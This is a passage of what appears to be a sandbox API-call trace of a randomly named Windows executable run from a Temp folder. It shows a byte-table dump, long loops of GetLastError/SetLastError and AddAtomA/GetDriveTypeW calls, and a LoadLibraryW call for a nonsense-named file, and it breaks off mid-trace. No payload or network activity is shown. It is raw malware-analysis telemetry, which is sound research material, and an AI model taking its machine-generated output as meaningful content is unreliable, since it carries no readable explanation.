5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\xdc\xb7\x3a\xaa\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0107.771] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0107.771] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.772] GetLastError () returned 0x0 [0107.772] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError 
(dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.773] SetLastError (dwErrCode=0x0) [0107.773] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.774] SetLastError (dwErrCode=0x0) [0107.774] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError 
(dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.775] GetLastError () returned 0x0 [0107.775] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.776] SetLastError (dwErrCode=0x0) [0107.776] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError 
(dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.777] GetLastError () returned 0x0 [0107.777] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError (dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.778] SetLastError 
(dwErrCode=0x0) [0107.778] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.779] SetLastError (dwErrCode=0x0) [0107.779] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError 
(dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.780] GetLastError () returned 0x0 [0107.780] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.781] GetLastError () returned 0x0 [0107.781] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError 
(dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.782] SetLastError (dwErrCode=0x0) [0107.782] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.783] SetLastError (dwErrCode=0x0) [0107.783] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError 
(dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.784] SetLastError (dwErrCode=0x0) [0107.784] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.785] GetLastError () returned 0x0 [0107.785] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError 
(dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.786] SetLastError (dwErrCode=0x0) [0107.786] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.787] GetLastError () returned 0x0 [0107.787] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError 
(dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.788] SetLastError (dwErrCode=0x0) [0107.788] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] GetLastError () returned 0x0 [0107.789] SetLastError (dwErrCode=0x0) [0107.789] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0107.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0107.790] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.790] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.790] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.790] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.791] AddAtomA (lpString=0x0) returned 0x0 [0107.791] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) 
returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.792] AddAtomA (lpString=0x0) returned 0x0 [0107.792] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0107.793] AddAtomA (lpString=0x0) returned 0x0 [0107.793] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
